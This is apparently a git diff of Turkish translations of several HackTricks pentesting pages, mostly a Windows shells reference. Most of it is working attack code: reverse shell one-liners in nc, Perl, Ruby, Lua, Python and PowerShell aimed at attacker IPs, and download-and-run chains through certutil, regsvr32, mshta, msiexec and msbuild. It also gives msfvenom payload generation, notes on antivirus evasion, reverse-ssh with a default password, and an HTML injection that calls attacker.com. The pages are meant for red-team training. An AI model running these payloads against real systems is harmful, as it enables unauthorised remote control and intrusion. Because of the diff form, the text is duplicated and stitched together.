# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
@ -104,7 +91,7 @@ wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_revers
```
{% endcode %}
* (2b) Windows 10 hedefi (daha önceki sürümler için, [proje readme](https://github.com/Fahrj/reverse-ssh#features)'ye bakın):
* (2b) Windows 10 hedefi (daha eski sürümler için, [proje readme](https://github.com/Fahrj/reverse-ssh#features) sayfasına bakın):
{% code overflow="wrap" %}
```bash
@ -113,9 +100,7 @@ certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/d
reverse-ssh.exe -p 4444 kali@10.0.0.2
```
{% endcode %}
* Eğer ReverseSSH port yönlendirme isteği başarılı olduysa, şimdi `reverse-ssh(.exe)` çalıştıran kullanıcının bağlamında varsayılan şifre olan `letmeinbrudipls` ile giriş yapabilirsiniz:
* Eğer ReverseSSH port yönlendirme isteği başarılı olduysa, şimdi `reverse-ssh(.exe)` kullanıcısının bağlamında varsayılan şifre `letmeinbrudipls` ile giriş yapabilmelisiniz:
```bash
# Interactive shell access
ssh -p 8888 127.0.0.1
@ -125,20 +110,21 @@ sftp -P 8888 127.0.0.1
```
## TTY Yok
Bazı nedenlerle tam bir TTY elde edemiyorsanız, kullanıcı girişi bekleyen programlarla hala etkileşimde bulunabilirsiniz. Aşağıdaki örnekte, şifre bir dosyayı okumak için `sudo`'ya iletilir:
Eğer bir nedenden dolayı tam bir TTY elde edemezseniz, **kullanıcı girdisi bekleyen programlarla yine de etkileşimde bulunabilirsiniz**. Aşağıdaki örnekte, şifre `sudo`'ya bir dosyayı okuması için iletilmektedir:
```bash
expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
```
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks** ve **HackTricks Cloud** github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,18 +1,19 @@
# Kabuklar - Windows
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahramana kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
**Try Hard Güvenlik Grubu**
@ -24,16 +25,14 @@ HackTricks'ı desteklemenin diğer yolları:
## Lolbas
[lolbas-project.github.io](https://lolbas-project.github.io/) sayfası, Windows için [https://gtfobins.github.io/](https://gtfobins.github.io/) gibi bir sayfadır.\
ıkça, **Windows'ta SUID dosyaları veya sudo ayrıcalıkları bulunmamaktadır**, ancak bazı **dizinlerin** nasıl (kötüye) **kullanılabileceğini** bilmek, **keyfi kod yürütme gibi beklenmeyen eylemleri gerçekleştirmek için** **nasıl** bazı **dizinlerin** kullanılabileceğini bilmek faydalıdır.
## NC
[lolbas-project.github.io](https://lolbas-project.github.io/) sayfası, linux için olan [https://gtfobins.github.io/](https://gtfobins.github.io/) gibi Windows için.\
ıkça, **Windows'ta SUID dosyaları veya sudo ayrıcalıkları bulunmamaktadır**, ancak bazı **dizinlerin** nasıl (kötüye) **kullanılabileceğini** bilmek, **keyfi kod yürütmek gibi** beklenmeyen bazı eylemleri gerçekleştirmek için **nasıl** kullanılabileceğini bilmek faydalıdır.
```bash
nc.exe -e cmd.exe <Attacker_IP> <PORT>
```
## SBD
**[sbd](https://www.kali.org/tools/sbd/) taşınabilir ve güvenli bir Netcat alternatifidir**. Unix benzeri sistemlerde ve Win32'de çalışır. Güçlü şifreleme, program yürütme, özelleştirilebilir kaynak portları ve sürekli yeniden bağlanma gibi özelliklere sahip olan sbd, TCP/IP iletişimi için çok yönlü bir çözüm sunar. Windows kullanıcıları için, Kali Linux dağıtımındaki sbd.exe sürümü, Netcat için güvenilir bir alternatif olarak kullanılabilir.
**[sbd](https://www.kali.org/tools/sbd/) taşınabilir ve güvenli bir Netcat alternatifidir**. Unix benzeri sistemlerde ve Win32'de çalışır. Güçlü şifreleme, program yürütme, özelleştirilebilir kaynak portları ve sürekli yeniden bağlantı gibi özelliklere sahip olan sbd, TCP/IP iletişimi için çok yönlü bir çözüm sunar. Windows kullanıcıları için, Kali Linux dağıtımından sbd.exe sürümü, Netcat için güvenilir bir alternatif olarak kullanılabilir.
```bash
# Victims machine
sbd -l -p 4444 -e bash -v -n
@ -52,27 +51,21 @@ C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('1
```
## Perl
Perl, Windows'ta oldukça yaygın olarak kullanılan bir betikleme dilidir. Perl betikleri genellikle `.pl` uzantılı dosyalarda bulunur. Perl betiklerini Windows üzerinde çalıştırmak için, öncelikle Perl yorumlayıcısını indirip yüklemeniz gerekir. Perl betiklerini Windows komut istemcisinde çalıştırmak için aşağıdaki komutu kullanabilirsiniz:
```perl
perl script.pl
```
Bu komut, belirtilen Perl betiğini çalıştıracaktır.
Perl, birçok hacker tarafından tercih edilen bir programlama dilidir. Perl betiği, Windows işletim sistemlerinde hedefe erişim sağlamak için sıklıkla kullanılır. Perl, Windows sistemlerinde hızlı ve etkili bir şekilde çalışabilir.
```bash
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```
## Ruby
Ruby, ık kaynaklı bir programlama dilidir ve genellikle Ruby on Rails web uygulama çerçevesinde kullanılır. Ruby ile Windows üzerinde kabuk oluşturmak için çeşitli yöntemler vardır. Bu yöntemler arasında `msfvenom` aracını kullanarak Ruby kabuk oluşturma, `weevely` aracını kullanarak Ruby kabuk oluşturma ve Ruby'yi Windows komut istemine dönüştürme bulunmaktadır. Bu yöntemler, Windows hedeflerinde kabuk oluşturmak için kullanılabilir.
Ruby, Windows için popüler bir programlama dilidir. Ruby programlama dili, Windows üzerinde çalışan çeşitli shell seçenekleri sunar. Bu seçenekler arasında IRB (Interactive Ruby Shell) ve Ruby script dosyalarını çalıştırmak için kullanılan Ruby komut satırı bulunmaktadır. Bu shell seçenekleri, Ruby programlama dilini kullanarak Windows sistemlerinde etkili bir şekilde çalışmayı sağlar.
```bash
#Windows
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```
## Lua
Lua, bir betik dili ve hafif bir çoklu programlama dilidir. Lua, C programlama diline benzer bir sözdizimine sahiptir ve C ile kolayca entegre edilebilir. Lua, genellikle oyun geliştirme ve uygulama betikleme için kullanılır. Lua, basit ve hızlı bir şekilde öğrenilebilir ve esnek bir dil olarak bilinir. Lua, birçok platformda desteklenir ve geniş bir topluluk tarafından desteklenmektedir.
Lua, bir betik dili ve hafif bir çoklu programlama dilidir. Lua, genellikle oyun geliştirme endüstrisinde kullanılır ve esnekliği ve hızı nedeniyle popülerdir. Lua, C diline benzer bir sözdizimine sahiptir ve C ile kolayca entegre edilebilir. Lua betikleri, Windows işletim sistemi üzerinde çalıştırılmak üzere Lua yürütücüsü kullanılarak çalıştırılabilir. Lua betikleri, Windows API'sine erişmek için kullanılabilir. Lua, Windows üzerinde yürütülen bir saldırı sırasında yararlı olabilir.
```bash
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
```
@ -84,7 +77,7 @@ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -node
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
```
Kurban
Hedef
```bash
#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
@ -106,6 +99,8 @@ powershell -exec bypass -f \\webdavserver\folder\payload.ps1
```
Ağ çağrısı yapan işlem: **svchost.exe**\
Diskte yazılmış yük: **WebDAV istemci yerel önbelleği**
**Tek satır:**
```bash
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
@ -167,8 +162,6 @@ var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
</scriptlet>
```
#### **Mshta - Metasploit**
Mshta is a utility in Windows that executes Microsoft HTML Applications (HTA). Metasploit has a module that can be used to execute malicious HTA payloads using mshta.exe. This technique can be used to bypass application whitelisting and execute arbitrary code on a target system.
```bash
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
@ -270,7 +263,7 @@ set lhost 10.2.0.5
run
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
```
**Koadic zombi dosyasını regsvr aracılığıyla çok kolay bir şekilde indirebilir ve çalıştırabilirsiniz**
**Koadic zombi dosyasını regsvr aşamasını kullanarak çok kolay bir şekilde indirebilir ve çalıştırabilirsiniz**
## Certutil
@ -280,7 +273,7 @@ Bir B64dll indirin, çözümleyin ve çalıştırın.
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
```
Bir B64exe indirin, onu çözümleyin ve çalıştırın.
Bir B64exe dosyası indirin, çözümleyin ve çalıştırın.
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
```
@ -320,7 +313,7 @@ Saldırgan
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
python -m SimpleHTTPServer 80
```
Kurban:
Hedef:
```
victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi
```
@ -359,17 +352,17 @@ Sadece bunu indirin ve çalıştırın: [https://raw.githubusercontent.com/Cn33l
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
```
**Tespit edilmedi**
**Algılanmadı**
## **CSC**
Kurban makinede C# kodunu derle.
Kurban makinede C# kodunu derleyin.
```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs
```
İşte temel bir C# ters kabuk indirebilirsiniz: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
**Tespit edilmedi**
**Algılanmadı**
## **Regasm/Regsvc**
@ -397,11 +390,11 @@ odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
[https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
**Kabuklar** klasöründe birçok farklı kabuk bulunmaktadır. Invoke-_PowerShellTcp.ps1_ dosyasını indirip çalıştırmak için betik dosyasının bir kopyasını oluşturun ve dosyanın sonuna ekleyin:
**Kabuklar** klasöründe birçok farklı kabuk bulunmaktadır. Invoke-_PowerShellTcp.ps1_ dosyasını indirip çalıştırmak için betik dosyasının bir kopyasını alın ve dosyanın sonuna ekleyin:
```
Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444
```
Sunucuda betiği hizmete başlatın ve kurbanın sonunda çalıştırın:
Sunucuda betiği sunmaya başlayın ve kurbanın sonunda çalıştırın:
```
powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"
```
@ -421,7 +414,7 @@ Defender henüz kötü amaçlı kod olarak algılamıyor (henüz, 3/04/2019).
**Powercat tarafından sunulan diğer seçenekler:**
Bağlama kabukları, Ters kabuk (TCP, UDP, DNS), Port yönlendirme, yükleme/indirme, Yük oluşturma, Dosyaları sunma...
Bağlama kabukları, Ters kabuk (TCP, UDP, DNS), Port yönlendirme, yükleme/indirme, Yük oluşturma, Dosyalar sunma...
```
Serve a cmd Shell:
powercat -l -p 443 -e cmd
@ -442,11 +435,11 @@ powercat -l -p 443 -i C:\inputfile -rep
[https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire)
Bir powershell başlatıcısı oluşturun, bir dosyaya kaydedin ve indirip çalıştırın.
Bir powershell başlatıcısı oluşturun, bir dosyaya kaydedin ve onu indirip çalıştırın.
```
powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
```
**Tespit edilen zararlı kod**
**Tespit edilen kötü amaçlı kod**
### MSF-Unicorn
@ -456,19 +449,19 @@ Unicorn kullanarak metasploit arka kapısının bir PowerShell versiyonunu oluş
```
python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443
```
Oluşturulan kaynakla msfconsole'ı başlatın:
Oluşturulan kaynağı kullanarak msfconsole'ı başlatın:
```
msfconsole -r unicorn.rc
```
Başlangıçta, _powershell\_attack.txt_ dosyasını sunan bir web sunucusu başlatın ve kurban üzerinde aşağıdaki komutu çalıştırın:
Başlangıçta, _powershell\_attack.txt_ dosyasını sunan bir web sunucusu başlatın ve kurban üzerinde şunu çalıştırın:
```
powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
```
**Tespit edilen zararlı kod**
**Kötü amaçlı kod olarak algılandı**
## Daha Fazla
[PS>Attack](https://github.com/jaredhaight/PSAttack) Bazı saldırgan PS modülleri önceden yüklenmiş PS konsolu (şifreli)\
[PS>Attack](https://github.com/jaredhaight/PSAttack) Bazı saldırgan PS modülleri önceden yüklenmiş PS konsolu (şifrelenmiş)\
[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\
WinPWN](https://github.com/SecureThisShit/WinPwn) Bazı saldırgan PS modülleri ve proxy tespiti ile PS konsolu (IEX)
@ -488,16 +481,17 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) Bazı saldırgan PS modülleri
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olacak şekilde AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **tanıtmak istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi Twitter'da takip edin 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* Hacking püf noktalarını paylaşarak PR'ler göndererek **HackTricks** ve **HackTricks Cloud** github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,29 +1,30 @@
{% hint style="success" %}
AWS Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerinizi sıfırdan kahraman seviyesine çıkarın</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile öğrenin!</strong></summary>
<summary>HackTricks'ı Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'da takip edin.**
* **HackTricks** ve **HackTricks Cloud** github depolarına PR göndererek hacking püf noktalarını paylaşın.
</details>
{% endhint %}
# Yönlendirici başlıkları ve politikası
# Referans başlıkları ve politika
Yönlendirici, tarayıcıların önceki ziyaret edilen sayfayı belirtmek için kullandığı başlıktır.
Referrer, tarayıcıların önceki ziyaret edilen sayfayı belirtmek için kullandığı başlıktır.
## Sızan hassas bilgiler
## Sızdırılan Hassas Bilgiler
Web sayfasının içinde herhangi bir noktada GET isteği parametrelerinde hassas bilgiler bulunuyorsa, sayfa harici kaynaklara bağlantılar içeriyorsa veya bir saldırgan kullanıcının saldırgan tarafından kontrol edilen bir URL'yi ziyaret etmesini/sunmasını (sosyal mühendislik) sağlayabiliyorsa, saldırgan en son GET isteği içindeki hassas bilgileri dışarı çıkarabilir.
Eğer bir web sayfasının içinde herhangi bir noktada GET isteği parametrelerinde hassas bilgi bulunuyorsa, sayfa harici kaynaklara bağlantılar içeriyorsa veya bir saldırgan kullanıcıyı saldırganın kontrol ettiği bir URL'yi ziyaret etmeye ikna edebiliyorsa (sosyal mühendislik), saldırgan en son GET isteği içindeki hassas bilgiyi dışarıya çıkarabilir.
## Hafifletme
Tarayıcının başka web uygulamalarına hassas bilgilerin gönderilmesini **önleyebilecek** bir **Yönlendirici politikası** izlemesini sağlayabilirsiniz:
Tarayıcının diğer web uygulamalarına hassas bilginin gönderilmesini **önleyebilecek** bir **Referrer politikası** izlemesini sağlayabilirsiniz:
```
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
@ -36,26 +37,11 @@ Referrer-Policy: unsafe-url
```
## Karşı Önlem
Bu kuralı geçersiz kılmak için bir HTML meta etiketi kullanabilirsiniz (saldırganın HTML enjeksiyonu kullanması gerekmektedir):
Bu kuralı geçersiz kılmak için bir HTML meta etiketi kullanabilirsiniz (saldırganın bir HTML enjeksiyonu yapması gerekmektedir):
```markup
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
```
## Savunma
Asla hassas verileri URL'deki GET parametreleri veya yollarda kullanmayın.
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi **HackTricks'te reklam vermek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek paylaşın.
</details>
Asla URL içinde GET parametrelerine veya yollara hassas veri koymayın.

View file

@ -1,30 +1,31 @@
# DDexec / EverythingExec
{% hint style="success" %}
AWS Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramanla öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimizden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
## Bağlam
Linux'ta bir programı çalıştırmak için, dosya olarak var olmalı ve dosya sistemi hiyerarşisi üzerinden bir şekilde erişilebilir olmalıdır (bu sadece `execve()` işlevinin çalışma şeklidir). Bu dosya diskte veya ram'de (tmpfs, memfd) bulunabilir, ancak bir dosya yolu gereklidir. Bu, Linux sistemde çalıştırılan şeyi kontrol etmeyi çok kolay hale getirir, tehditleri ve saldırgan araçlarını tespit etmeyi veya onların hiçbir şeyini çalıştırmalarına izin vermemeyi kolaylaştırır (_örneğin_, ayrıcalığı olmayan kullanıcıların yürütülebilir dosyaları herhangi bir yere yerleştirmelerine izin vermemek).
